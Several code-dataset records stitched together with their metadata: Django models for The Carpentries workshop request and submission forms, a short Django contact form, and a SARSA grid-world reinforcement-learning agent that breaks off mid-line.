ComputingExperienceLevel,\n Curriculum,\n InfoSource,\n CommonRequest,\n)\n\n\nclass DataAnalysisLevel(models.Model):\n # ComputingExperienceLevel's sibling\n name = models.CharField(max_length=STR_LONGEST, null=False, blank=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dataanalysislevel\"\n\n\nclass DCWorkshopTopic(models.Model):\n \"\"\"Single lesson topic used in a workshop.\"\"\"\n\n name = models.CharField(max_length=STR_LONGEST, null=False, blank=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dcworkshoptopic\"\n\n\nclass DCWorkshopDomain(models.Model):\n \"\"\"Single domain used in a workshop (it corresponds to a set of lessons\n Data Carpentry prepared).\"\"\"\n\n name = models.CharField(max_length=STR_LONGEST, null=False, blank=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dcworkshopdomain\"\n\n\nclass DataVariant(models.Model):\n name = models.CharField(\n max_length=300,\n null=False,\n blank=False,\n default=\"\",\n unique=True,\n verbose_name=\"Name\",\n help_text=\"Data variant name and description\",\n )\n unknown = models.BooleanField(\n null=False,\n blank=True,\n default=False,\n verbose_name=\"Unknown entry\",\n help_text=\"Mark this record as 'I don't know yet', or \"\n \"'Unknown', or 'Not sure yet'. There can be only one such \"\n \"record in the database.\",\n )\n\n class Meta:\n verbose_name = \"Data variant\"\n verbose_name_plural = \"Data variants\"\n ordering = [\n \"id\",\n ]\n\n def __str__(self):\n return self.name\n\n @transaction.atomic\n def save(self, *args, **kwargs):\n \"\"\"When saving with `unknown=True`, update all other records with this\n parameter to `unknown=False`. This helps keeping only one record with\n `unknown=True` in the database - a specific case of uniqueness.\"\"\"\n\n # wrapped in transaction in order to prevent from updating records to\n # `unknown=False` when saving fails\n if self.unknown:\n DataVariant.objects.filter(unknown=True).update(unknown=False)\n return super().save(*args, **kwargs)\n\n\nclass EventRequest(\n AssignmentMixin, StateMixin, CreatedUpdatedMixin, EventLinkMixin, models.Model\n):\n name = models.CharField(max_length=STR_MED)\n email = models.EmailField()\n affiliation = models.CharField(\n max_length=STR_LONG, help_text=\"University or Company\"\n )\n location = models.CharField(\n max_length=STR_LONG, help_text=\"City, Province, or State\"\n )\n country = CountryField()\n conference = models.CharField(\n max_length=STR_LONG,\n verbose_name=\"If the workshop is to be associated with a conference \"\n \"or meeting, which one? \",\n blank=True,\n default=\"\",\n )\n preferred_date = models.CharField(\n max_length=STR_LONGEST,\n help_text=\"Please indicate when you would like to run the workshop. 
\"\n \"A range of at least a month is most helpful, although if \"\n \"you have specific dates you need the workshop, we will try \"\n \"to accommodate those requests.\",\n verbose_name=\"Preferred workshop dates\",\n )\n language = models.ForeignKey(\n Language,\n verbose_name=\"What human language do you want the workshop to be run\" \" in?\",\n null=True,\n on_delete=models.SET_NULL,\n )\n\n WORKSHOP_TYPE_CHOICES = (\n (\"swc\", \"Software-Carpentry\"),\n (\"dc\", \"Data-Carpentry\"),\n )\n workshop_type = models.CharField(\n max_length=STR_MED, choices=WORKSHOP_TYPE_CHOICES, blank=False, default=\"swc\",\n )\n\n ATTENDEES_NUMBER_CHOICES = (\n (\"1-20\", \"1-20 (one room, two instructors)\"),\n (\"20-40\", \"20-40 (one room, two instructors)\"),\n (\"40-80\", \"40-80 (two rooms, four instructors)\"),\n (\"80-120\", \"80-120 (three rooms, six instructors)\"),\n )\n approx_attendees = models.CharField(\n max_length=STR_MED,\n choices=ATTENDEES_NUMBER_CHOICES,\n help_text=\"This number doesn't need to be precise, but will help us \"\n \"decide how many instructors your workshop will need.\"\n \"Each workshop must have at least two instructors.\",\n verbose_name=\"Approximate number of Attendees\",\n blank=False,\n default=\"20-40\",\n )\n\n attendee_domains = models.ManyToManyField(\n KnowledgeDomain,\n help_text=\"The attendees' academic field(s) of study, if known.\",\n verbose_name=\"Domains or topic of interest for target audience\",\n blank=False,\n )\n attendee_domains_other = models.CharField(\n max_length=STR_LONG,\n help_text=\"If none of the fields above works for you.\",\n verbose_name=\"Other domains or topics of interest\",\n blank=True,\n default=\"\",\n )\n DATA_TYPES_CHOICES = (\n (\"survey\", \"Survey data (ecology, biodiversity, social science)\"),\n (\"genomic\", \"Genomic data\"),\n (\"geospatial\", \"Geospatial data\"),\n (\"text-mining\", \"Text mining\"),\n (\"\", \"Other:\"),\n )\n data_types = models.CharField(\n max_length=STR_MED,\n choices=DATA_TYPES_CHOICES,\n verbose_name=\"We currently have developed or are developing workshops\"\n \" focused on four types of data. Please let us know which\"\n \" workshop would best suit your needs.\",\n blank=True,\n )\n data_types_other = models.CharField(\n max_length=STR_LONG,\n verbose_name=\"Other data domains for the workshop\",\n blank=True,\n )\n attendee_academic_levels = models.ManyToManyField(\n \"workshops.AcademicLevel\",\n help_text=\"If you know the academic level(s) of your attendees, \"\n \"indicate them here.\",\n verbose_name=\"Attendees' Academic Level\",\n )\n attendee_computing_levels = models.ManyToManyField(\n \"workshops.ComputingExperienceLevel\",\n help_text=\"Indicate the attendees' level of computing experience, if \"\n \"known. We will ask attendees to fill in a skills survey \"\n \"before the workshop, so this answer can be an \"\n \"approximation.\",\n verbose_name=\"Attendees' level of computing experience\",\n )\n attendee_data_analysis_level = models.ManyToManyField(\n DataAnalysisLevel,\n help_text=\"If you know, indicate learner's general level of data \"\n \"analysis experience\",\n verbose_name=\"Level of data analysis experience\",\n )\n understand_admin_fee = models.BooleanField(\n default=False,\n # verbose_name a.k.a. 
label and help_text were moved to the\n # SWCEventRequestForm and DCEventRequestForm\n )\n\n ADMIN_FEE_PAYMENT_CHOICES = (\n (\"NP1\", \"Non-profit / non-partner: US$2500\"),\n (\"FP1\", \"For-profit: US$10,000\"),\n (\n \"self-organized\",\n \"Self-organized: no fee (please let us know if you \"\n \"wish to make a donation)\",\n ),\n (\"waiver\", \"Waiver requested (please give details in \" '\"Anything else\")'),\n )\n admin_fee_payment = models.CharField(\n max_length=STR_MED,\n choices=ADMIN_FEE_PAYMENT_CHOICES,\n verbose_name=\"Which of the following applies to your payment for the \"\n \"administrative fee?\",\n blank=False,\n default=\"NP1\",\n )\n fee_waiver_request = models.BooleanField(\n help_text=\"Waiver's of the administrative fee are available on \"\n \"a needs basis. If you are interested in submitting a waiver\"\n \" application please indicate here.\",\n verbose_name=\"I would like to submit an administrative fee waiver \"\n \"application\",\n default=False,\n )\n cover_travel_accomodation = models.BooleanField(\n default=False,\n verbose_name=\"My institution will cover instructors' travel and \"\n \"accommodation costs.\",\n )\n TRAVEL_REIMBURSEMENT_CHOICES = (\n (\"\", \"Don't know yet.\"),\n (\"book\", \"Book travel through our university or program.\"),\n (\"reimburse\", \"Book their own travel and be reimbursed.\"),\n (\"\", \"Other:\"),\n )\n travel_reimbursement = models.CharField(\n max_length=STR_MED,\n verbose_name=\"How will instructors' travel and accommodations be \" \"managed?\",\n choices=TRAVEL_REIMBURSEMENT_CHOICES,\n blank=True,\n default=\"\",\n )\n travel_reimbursement_other = models.CharField(\n max_length=STR_LONG,\n verbose_name=\"Other propositions for managing instructors' travel and\"\n \" accommodations\",\n blank=True,\n )\n comment = models.TextField(\n help_text=\"What else do you want us to know about your workshop? About\"\n \" your attendees? 
About you?\",\n verbose_name=\"Anything else?\",\n blank=True,\n )\n\n def get_absolute_url(self):\n return reverse(\"eventrequest_details\", args=[self.pk])\n\n def __str__(self):\n return \"{name} (from {affiliation}, {type} workshop)\".format(\n name=self.name, affiliation=self.affiliation, type=self.workshop_type,\n )\n\n class Meta:\n ordering = [\"created_at\"]\n\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_eventrequest\"\n\n\nclass EventSubmission(\n AssignmentMixin, StateMixin, CreatedUpdatedMixin, EventLinkMixin, models.Model\n):\n url = models.URLField(\n null=False, blank=False, verbose_name=\"Link to the workshop's website\"\n )\n contact_name = models.CharField(\n null=False, blank=False, max_length=STR_LONG, verbose_name=\"Your name\"\n )\n contact_email = models.EmailField(\n null=False,\n blank=False,\n verbose_name=\"Your email\",\n help_text=\"We may need to contact you regarding workshop details.\",\n )\n self_organized = models.BooleanField(\n null=False, default=False, verbose_name=\"Was the workshop self-organized?\"\n )\n notes = models.TextField(null=False, blank=True, default=\"\")\n\n def __str__(self):\n return \"Event submission <{}>\".format(self.url)\n\n def get_absolute_url(self):\n return reverse(\"eventsubmission_details\", args=[self.pk])\n\n class Meta:\n ordering = [\"created_at\"]\n\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_eventsubmission\"\n\n\nclass DCSelfOrganizedEventRequest(\n AssignmentMixin, StateMixin, CreatedUpdatedMixin, EventLinkMixin, models.Model\n):\n \"\"\"Should someone want to run a self-organized Data Carpentry event, they\n have to fill this specific form first. 
See\n https://github.com/swcarpentry/amy/issues/761\"\"\"\n\n name = models.CharField(max_length=STR_LONGEST,)\n email = models.EmailField()\n organization = models.CharField(\n max_length=STR_LONGEST, verbose_name=\"University or organization affiliation\",\n )\n INSTRUCTOR_CHOICES = [\n (\"\", \"None\"),\n (\n \"incomplete\",\n \"Have gone through instructor training, but haven't \"\n \"yet completed checkout\",\n ),\n (\"dc\", \"Certified Data Carpentry instructor\"),\n (\"swc\", \"Certified Software Carpentry instructor\"),\n (\"both\", \"Certified Software and Data Carpentry instructor\"),\n ]\n instructor_status = models.CharField(\n max_length=STR_MED,\n choices=INSTRUCTOR_CHOICES,\n verbose_name=\"Your Software and Data Carpentry instructor status\",\n blank=True,\n )\n PARTNER_CHOICES = [\n (\"y\", \"Yes\"),\n (\"n\", \"No\"),\n (\"u\", \"Unsure\"),\n (\"\", \"Other (enter below)\"),\n ]\n is_partner = models.CharField(\n max_length=1,\n choices=PARTNER_CHOICES,\n blank=True,\n verbose_name=\"Is your organization a Data Carpentry or Software \"\n \"Carpentry Partner\",\n )\n is_partner_other = models.CharField(\n max_length=STR_LONG,\n default=\"\",\n blank=True,\n verbose_name=\"Other (is your organization a Partner?)\",\n )\n location = models.CharField(\n max_length=STR_LONGEST,\n verbose_name=\"Location\",\n help_text=\"City, Province or State\",\n )\n country = CountryField()\n associated_conference = models.CharField(\n max_length=STR_LONG,\n default=\"\",\n blank=True,\n verbose_name=\"Associated conference\",\n help_text=\"If the workshop is to be associated with a conference or \"\n \"meeting, which one?\",\n )\n dates = models.CharField(\n max_length=STR_LONGEST,\n verbose_name=\"Planned workshop dates\",\n help_text=\"Preferably in YYYY-MM-DD to YYYY-MM-DD format\",\n )\n\n # workshop domain(s)\n domains = models.ManyToManyField(\n DCWorkshopDomain,\n blank=False,\n verbose_name=\"Domain for the workshop\",\n help_text=\"Set of lessons you're going to teach\",\n )\n domains_other = models.CharField(\n max_length=STR_LONGEST,\n blank=True,\n default=\"\",\n verbose_name=\"Other domains for the workshop\",\n help_text=\"If none of the fields above works for you.\",\n )\n\n # Lesson topics to be taught during the workshop\n topics = models.ManyToManyField(\n DCWorkshopTopic,\n blank=False,\n verbose_name=\"Topics to be taught\",\n help_text=\"A Data Carpentry workshop must include a Data Carpentry \"\n \"lesson on data organization and three other modules in the \"\n \"same domain from the Data Carpentry curriculum (see http://www.'\n \"datacarpentry.org/workshops/). 
If you do want to \"\n \"include materials not in our curriculum, please note that \"\n \"below and we'll get in touch.\",\n )\n topics_other = models.CharField(\n max_length=STR_LONGEST,\n blank=True,\n default=\"\",\n verbose_name=\"Other topics to be taught\",\n help_text=\"If none of the fields above works for you.\",\n )\n\n # questions about attendees' experience levels\n attendee_academic_levels = models.ManyToManyField(\n \"workshops.AcademicLevel\",\n help_text=\"If you know the academic level(s) of your attendees, \"\n \"indicate them here.\",\n verbose_name=\"Attendees' academic level\",\n )\n attendee_data_analysis_level = models.ManyToManyField(\n DataAnalysisLevel,\n help_text=\"If you know, indicate learner's general level of data \"\n \"analysis experience\",\n verbose_name=\"Attendees' level of data analysis experience\",\n )\n\n # payments\n PAYMENT_CHOICES = [\n (\n \"per_participant\",\n \"I will contribute $25/participant through \" \"registration fees\",\n ),\n (\"invoice\", \"I will contribute $500 via an invoice\"),\n (\"credit_card\", \"I will contribute $500 via a credit card payment\"),\n (\"fee_waiver\", \"I would like to request a fee waiver\"),\n ]\n payment = models.CharField(\n max_length=STR_MED,\n blank=False,\n choices=PAYMENT_CHOICES,\n default=\"per_participant\",\n verbose_name=\"Payment choice\",\n help_text=\"Self-organized workshops for non-Partner organizations are \"\n \"$500 or $25/participant for a workshop licensing fee (http://www.datacarpentry.org/self-organized-workshops/'\n \"). Fee waivers are available and generally granted upon\"\n \" request.\",\n )\n fee_waiver_reason = models.CharField(\n max_length=STR_LONGEST,\n default=\"\",\n blank=True,\n verbose_name=\"Reason for requesting a fee waiver\",\n )\n\n # confirmations\n handle_registration = models.BooleanField(\n default=False,\n blank=False,\n verbose_name=\"I confirm that I will handle registration for this\" \" workshop\",\n )\n distribute_surveys = models.BooleanField(\n default=False,\n blank=False,\n verbose_name=\"I confirm that I will distribute the Data Carpentry \"\n \"surveys to workshop participants\",\n )\n follow_code_of_conduct = models.BooleanField(\n default=False,\n blank=False,\n verbose_name=\"I confirm that I will follow the Data Carpentry Code of\"\n \" Conduct\",\n )\n\n def get_absolute_url(self):\n return reverse(\"dcselforganizedeventrequest_details\", args=[self.pk])\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dcselforganizedeventrequest\"\n\n\nclass WorkshopInquiryRequest(\n AssignmentMixin,\n StateMixin,\n CreatedUpdatedMixin,\n CommonRequest,\n DataPrivacyAgreementMixin,\n COCAgreementMixin,\n HostResponsibilitiesMixin,\n InstructorAvailabilityMixin,\n EventLinkMixin,\n models.Model,\n):\n \"\"\"\n This model is used for storing inquiry information from anyone interested\n in The Carpentries and workshops in general.\n \"\"\"\n\n UNSURE_CHOICE = (\"\", \"Not sure yet.\")\n\n location = models.CharField(\n max_length=STR_LONGEST,\n blank=False,\n null=False,\n default=\"\",\n verbose_name=\"Workshop location\",\n help_text=\"City, state, or province.\",\n )\n country = CountryField(null=False, blank=False, verbose_name=\"Country\",)\n # Here starts \"Your Audience\" part with this description:\n # The Carpentries offers several different workshops intended 
for audiences\n # from different domain backgrounds, with different computational\n # experience and learning goals. Your responses to the following questions\n # will help us advise you on which workshop(s) may best serve your\n # audience. All questions are optional so please share as much as you can.\n routine_data = models.ManyToManyField(\n DataVariant,\n blank=True,\n verbose_name=\"What kinds of data does your target audience routinely \"\n \"work with?\",\n help_text=\"Check all that apply.\",\n )\n routine_data_other = models.CharField(\n max_length=STR_LONGEST,\n blank=True,\n default=\"\",\n verbose_name=\"Other kinds of routinely worked-with data\",\n )\n domains = models.ManyToManyField(\n KnowledgeDomain,\n blank=True,\n verbose_name=\"Domains or topic of interest for target audience\",\n help_text=\"The attendees' academic field(s) of study, if known. Check \"\n \"all that apply.\",\n )\n domains_other = models.CharField(\n max_length=STR_LONGEST, blank=True, default=\"\", verbose_name=\"Other domains\",\n )\n academic_levels = models.ManyToManyField(\n AcademicLevel,\n blank=True,\n verbose_name=\"Attendees' academic level / career stage\",\n help_text=\"If you know the academic level(s) of your attendees, \"\n \"indicate them here. Check all that apply.\",\n )\n computing_levels = models.ManyToManyField(\n ComputingExperienceLevel,\n blank=True,\n verbose_name=\"Attendees' level of computing experience\",\n help_text=\"Indicate the attendees' level of computing experience, if \"\n \"known. We will ask attendees to fill in a skills survey \"\n \"before the workshop, so this answer can be an \"\n \"approximation. Check all that apply.\",\n )\n audience_description = models.TextField(\n blank=True,\n verbose_name=\"Please describe your anticipated audience, including \"\n \"their experience, background, and goals\",\n )\n SWC_LESSONS_LINK = (\n ''\n \"Software Carpentry lessons page\"\n )\n DC_LESSONS_LINK = (\n ''\n \"Data Carpentry lessons page\"\n )\n LC_LESSONS_LINK = (\n ''\n \"Library Carpentry lessons page\"\n )\n requested_workshop_types = models.ManyToManyField(\n Curriculum,\n limit_choices_to={\"active\": True},\n blank=True,\n verbose_name=\"Which Carpentries workshop are you requesting?\",\n help_text=\"If your learners are new to programming and primarily \"\n \"interested in working with data, Data Carpentry is likely \"\n \"the best choice. If your learners are interested in \"\n \"learning more about programming, including version control\"\n \" and automation, Software Carpentry is likely the best \"\n \"match. If your learners are people working in library and \"\n \"information related roles interested in learning data and \"\n \"software skills, Library Carpentry is the best choice. \"\n \"Please visit the \"\n + SWC_LESSONS_LINK\n + \", \"\n + DC_LESSONS_LINK\n + \", or the \"\n + LC_LESSONS_LINK\n + \" for more information about any of our lessons. If you’re \"\n \"not sure and would like to discuss with us, please select \"\n 'the \"Don\\'t know yet\" option below.
'\n \"Check all that apply.\",\n )\n preferred_dates = models.DateField(\n blank=True,\n null=True,\n verbose_name=\"Preferred dates\",\n help_text=\"Our workshops typically run two full days. Please select \"\n \"your preferred first day for the workshop. If you do not \"\n \"have exact dates or are interested in an alternative \"\n \"schedule, please indicate so below. Because we need to \"\n \"coordinate with instructors, a minimum of 2-3 months lead \"\n \"time is required for workshop planning.\",\n )\n other_preferred_dates = models.CharField(\n max_length=200,\n blank=True,\n null=False,\n default=\"\",\n verbose_name=\"If your dates are not set, please provide more \"\n \"information below\",\n )\n language = models.ForeignKey(\n Language,\n on_delete=models.PROTECT,\n blank=True,\n null=True,\n verbose_name=\"What is the preferred language of communication for the \"\n \"workshop?\",\n help_text=\"Our workshops are offered primarily in English, with a few \"\n \"of our lessons available in Spanish. While materials are \"\n \"mainly in English, we know it can be valuable to have an \"\n \"instructor who speaks the native language of the learners. \"\n \"We will attempt to locate Instructors speaking a particular\"\n \" language, but cannot guarantee the availability of \"\n \"non-English speaking Instructors.\",\n )\n ATTENDEES_NUMBER_CHOICES = (\n UNSURE_CHOICE,\n (\"10-40\", \"10-40 (one room, two instructors)\"),\n (\"40-80\", \"40-80 (two rooms, four instructors)\"),\n (\"80-120\", \"80-120 (three rooms, six instructors)\"),\n )\n number_attendees = models.CharField(\n max_length=15,\n choices=ATTENDEES_NUMBER_CHOICES,\n blank=True,\n null=True,\n default=None,\n verbose_name=\"Anticipated number of attendees\",\n help_text=\"These recommendations are for in-person workshops. \"\n \"This number doesn't need to be precise, but will help us \"\n \"decide how many instructors your workshop will need. \"\n \"Each workshop must have at least two instructors.
\"\n \"For online Carpentries workshops, we recommend a maximum of \"\n \"20 learners per class. If your workshop attendance will \"\n \"exceed 20 learners please be sure to include a note in the \"\n \"comments section below. \"\n ,\n )\n FEE_CHOICES = (\n UNSURE_CHOICE,\n (\n \"nonprofit\",\n \"I am with a government site, university, or other \"\n \"nonprofit. I understand the workshop fee of US$2500, \"\n \"and agree to follow through on The Carpentries \"\n \"invoicing process.\",\n ),\n (\n \"forprofit\",\n \"I am with a corporate or for-profit site. I understand \"\n \"The Carpentries staff will contact me about workshop \"\n \"fees. I will follow through on The Carpentries \"\n \"invoicing process for the agreed upon fee.\",\n ),\n (\n \"member\",\n \"I am with a Member Organisation so the workshop fee does \"\n \"not apply (Instructor travel costs will still apply).\",\n ),\n (\n \"waiver\",\n \"I am requesting a scholarship for the workshop fee \"\n \"(Instructor travel costs will still apply).\",\n ),\n )\n administrative_fee = models.CharField(\n max_length=20,\n choices=FEE_CHOICES,\n blank=True,\n null=True,\n default=None,\n verbose_name=\"Which of the following applies to your payment for the \"\n \"administrative fee?\",\n )\n TRAVEL_EXPENCES_MANAGEMENT_CHOICES = (\n UNSURE_CHOICE,\n (\n \"booked\",\n \"Hotel and airfare will be booked by site; ground travel \"\n \"and meals/incidentals will be reimbursed within 60 days.\",\n ),\n (\n \"reimbursed\",\n \"All expenses will be booked by instructors and \"\n \"reimbursed within 60 days.\",\n ),\n (\"other\", \"Other:\"),\n )\n travel_expences_management = models.CharField(\n max_length=20,\n null=False,\n blank=True,\n default=\"\",\n choices=TRAVEL_EXPENCES_MANAGEMENT_CHOICES,\n verbose_name=\"How will you manage travel expenses for Carpentries \"\n \"Instructors?\",\n )\n travel_expences_management_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other travel expences management\",\n )\n travel_expences_agreement = models.BooleanField(\n null=False,\n blank=False,\n default=False,\n verbose_name=\"Regardless of the fee due to The Carpentries, I \"\n \"understand I am also responsible for travel costs for \"\n \"the Instructors which can include airfare, ground \"\n \"travel, hotel, and meals/incidentals. I understand \"\n \"local Instructors will be prioritized but not \"\n \"guaranteed. Instructor travel costs are managed \"\n \"directly between the host site and the Instructors, not \"\n \"through The Carpentries. I will share detailed \"\n \"information regarding policies and procedures for \"\n \"travel arrangements with instructors. All \"\n \"reimbursements will be completed within 60 days of \"\n \"the workshop.\",\n )\n RESTRICTION_CHOICES = (\n UNSURE_CHOICE,\n (\"no_restrictions\", \"No restrictions.\"),\n (\"other\", \"Other:\"),\n )\n institution_restrictions = models.CharField(\n max_length=20,\n null=False,\n blank=True,\n default=\"\",\n choices=RESTRICTION_CHOICES,\n verbose_name=\"Our instructors live, teach, and travel globally. We \"\n \"understand that institutions may have citizenship, \"\n \"confindentiality agreements or other requirements for \"\n \"employees or volunteers who facilitate workshops. 
If \"\n \"your institution fits this description, please share \"\n \"your requirements or note that there are no \"\n \"restrictions.\",\n )\n institution_restrictions_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other (institution restrictions)\",\n )\n carpentries_info_source = models.ManyToManyField(\n InfoSource,\n blank=True,\n verbose_name=\"How did you hear about The Carpentries?\",\n help_text=\"Check all that apply.\",\n )\n carpentries_info_source_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other source for information about The Carpentries\",\n )\n user_notes = models.TextField(\n blank=True,\n verbose_name=\"Will this workshop be conducted in-person or online? \"\n \"Is there any other information you would like to share \"\n \"with us?\",\n help_text=\"Knowing if this workshop is on-line or in-person will \"\n \"help ensure we can best support you in coordinating the event.\",\n )\n\n # override field `public_event` from CommonRequest mixin\n public_event = models.CharField(\n max_length=CommonRequest._meta.get_field(\"public_event\").max_length,\n null=False,\n blank=True,\n default=\"\",\n choices=(UNSURE_CHOICE,)\n + CommonRequest._meta.get_field(\"public_event\").choices,\n verbose_name=CommonRequest._meta.get_field(\"public_event\").verbose_name,\n help_text=CommonRequest._meta.get_field(\"public_event\").help_text,\n )\n\n class Meta:\n ordering = [\"created_at\"]\n\n def __str__(self):\n return (\n \"Workshop inquiry ({institution}, {personal} {family}) - {state}\"\n ).format(\n institution=str(self.institution or self.institution_other_name),\n personal=self.personal,\n family=self.family,\n state=self.get_state_display(),\n )\n\n def dates(self):\n if self.preferred_dates:\n return \"{:%Y-%m-%d}\".format(self.preferred_dates)\n else:\n return self.other_preferred_dates\n\n def preferred_dates_too_soon(self):\n # set cutoff date at 2 months\n cutoff = datetime.timedelta(days=2 * 30)\n if self.preferred_dates:\n return (self.preferred_dates - self.created_at.date()) < cutoff\n return False\n\n def get_absolute_url(self):\n return reverse(\"workshopinquiry_details\", args=[self.id])\n\n\nclass SelfOrganisedSubmission(\n AssignmentMixin,\n StateMixin,\n CreatedUpdatedMixin,\n CommonRequest,\n DataPrivacyAgreementMixin,\n COCAgreementMixin,\n HostResponsibilitiesMixin,\n EventLinkMixin,\n models.Model,\n):\n \"\"\"\n This model is used for storing user-submitted self-organised workshop\n information. It's very similar to Workshop Submission combined with\n DC Self-Organized Workshop Request.\n \"\"\"\n\n start = models.DateField(\n null=True,\n verbose_name=\"Workshop start date\",\n help_text=\"Please provide the dates that your Self-Organised workshop will\"\n \" run.\",\n )\n end = models.DateField(\n null=True,\n verbose_name=\"Workshop end date\"\n )\n workshop_url = models.URLField(\n max_length=STR_LONGEST,\n blank=True,\n null=False,\n default=\"\",\n verbose_name=\"Please share your workshop URL\",\n help_text=\"Use the link to the website, not the repository. This is \"\n \"typically in the format https://username.github.io/\"\n \"YYYY-MM-DD-sitename. 
If you are running an online workshop, \"\n \"please use the format YYYY-MM-DD-sitename-online.\",\n )\n FORMAT_CHOICES = (\n (\"standard\", \"Standard two-day Carpentries workshop\"),\n (\"short\", \"Short session (less than two days)\"),\n (\n \"periodic\",\n \"Modules taught over a period of time (several weeks, \"\n \"one semester, etc.)\",\n ),\n (\"other\", \"Other:\"),\n )\n workshop_format = models.CharField(\n max_length=20,\n null=False,\n blank=False,\n default=\"\",\n choices=FORMAT_CHOICES,\n verbose_name=\"What is the format of this workshop?\",\n )\n workshop_format_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other workshop format\",\n )\n workshop_types = models.ManyToManyField(\n Curriculum,\n limit_choices_to={\"active\": True},\n blank=False,\n verbose_name=\"Which Carpentries workshop are you teaching?\",\n )\n workshop_types_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other workshop types\",\n )\n workshop_types_other_explain = models.TextField(\n blank=True,\n verbose_name='If you selected \"Mix & Match\", please provide more'\n \" information here\",\n help_text=\"For example \\\"We are teaching Software Carpentry's Git \"\n 'lesson only\" or \"We are teaching Data Carpentry\\'s Ecology '\n 'workshop, but not teaching a programming language.\"',\n )\n country = CountryField(null=True, blank=False, verbose_name=\"Country\",)\n language = models.ForeignKey(\n Language,\n on_delete=models.PROTECT,\n blank=False,\n null=False,\n verbose_name=\"What language is this workshop being conducted in?\",\n )\n\n class Meta:\n verbose_name = \"Self-Organised Submission\"\n verbose_name_plural = \"Self-Organised Submissions\"\n ordering = [\"created_at\"]\n\n def __str__(self):\n return (\n \"Self-Organised Submission ({institution}, {personal} {family}) - {state}\"\n ).format(\n institution=str(self.institution or self.institution_other_name),\n personal=self.personal,\n family=self.family,\n state=self.get_state_display(),\n )\n\n def get_absolute_url(self):\n return reverse(\"selforganisedsubmission_details\", args=[self.id])\n","sub_path":"amy/extrequests/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":34975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"113302981","text":"# -*- coding: utf-8 -*-\n\"\"\"Forms.\"\"\"\n\nfrom django import forms\n\nSUBJECTS = (\n ('1','Others'),\n ('2','Report a bug'),\n ('3','Suggest'),\n)\n\nclass ContactForm(forms.Form):\n \"\"\"Contact form class.\"\"\"\n subject = forms.ChoiceField(choices = SUBJECTS,\n required = True, widget=forms.Select(attrs = {'size':'1'}))\n msg = forms.CharField(widget = forms.Textarea,\n label = u'Text', required=True)\n #sender = forms.EmailField(label=u'E-mail',\n # required=True, widget=forms.TextInput(attrs={'size':'40'}))\n #copy = forms.BooleanField(required=False, label=u'Send me a copy')","sub_path":"equipy_main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"321077121","text":"import numpy as np\nimport pickle\nimport random\nfrom collections import defaultdict\nfrom env import Env\n\nMAX_EPISODE = 1000\n\nclass SARSAgent:\n def __init__(self, actions):\n self.actions = actions\n self.learning_rate = 0.01\n self.discount_factor = 0.9\n self.epsilon = 0.1 # 3) 시간이 
지날수록 e 값이 감소하도록 코드를 수정하세요.\n self.q_table = defaultdict(lambda: [0.0, 0.0, 0.0, 0.0])\n\n # 큐함수 업데이트\n def learn(self, s, a, r, s_, a_):\n self.q_table[s][a] += self.learning_rate * (r + self.discount_factor * self.q_table[s_][a_] - self.q_table[s][a])\n\n # 입실론 탐욕 정책에 따라서 행동을 반환\n def get_action(self, state):\n if np.random.rand() < self.epsilon:\n # 무작위 행동 선택 (exploration)\n best_action = np.random.choice(self.actions)\n else:\n # 큐함수에 따른 최적 행동 반환 (exploitation)\n state_action = self.q_table[state]\n best_action = self.arg_max(state_action)\n\n return best_action\n\n \"\"\"\n @staticmethod\n def arg_max(state_action):\n max_index_list = []\n max_value = state_action[0]\n for index, value in enumerate(state_action):\n if value > max_value:\n max_index_list.clear()\n max_value = value\n max_index_list.append(index)\n elif value == max_value:\n max_index_list.append(index)\n return random.choice(max_index_list)\n \"\"\"\n\n @staticmethod\n def arg_max(state_action):\n max_index_list = []\n max_value = -9999\n\n for index, value in enumerate(state_action):\n if value > max_value:\n max_index_list.clear()\n max_value = value\n max_index_list.append(index)\n elif value == max_value:\n max_index_list.append(index)\n\n return random.choice(max_index_list)\n\n\nif __name__ == \"__main__\":\n env = Env() # 환경에 대한 instance 생성\n agent = SARSAgent(actions=list(range(env.n_actions))) # Sarsa Agent 객체 생성\n\n success_total_step = 0\n fail_total_step = 0\n num_success = 0\n num_fail = 0\n step_log = []\n\n # 지정된 횟수(MAX_EPISODE)만큼 episode 진행\n for episode in range(MAX_EPISODE):\n # 게임 환경과 상태를 초기화 하고, 상태(state)값 얻기\n num_step = 0\n\n state = env.reset()\n\n # 현재 상태에서 어떤 행동을 할지 선택\n action = agent.get_action(str(state))\n\n # 한개의 episode를 처음부터 끝까지 처리하는 while-loop\n while True:\n env.render()\n\n num_step += 1\n\n next_state, reward, done = env.step(action)\n next_action = agent.get_action(str(next_state))\n\n agent.learn(str(state), action, reward, str(next_state), next_action)\n\n state = next_state\n action = next_action\n # action = 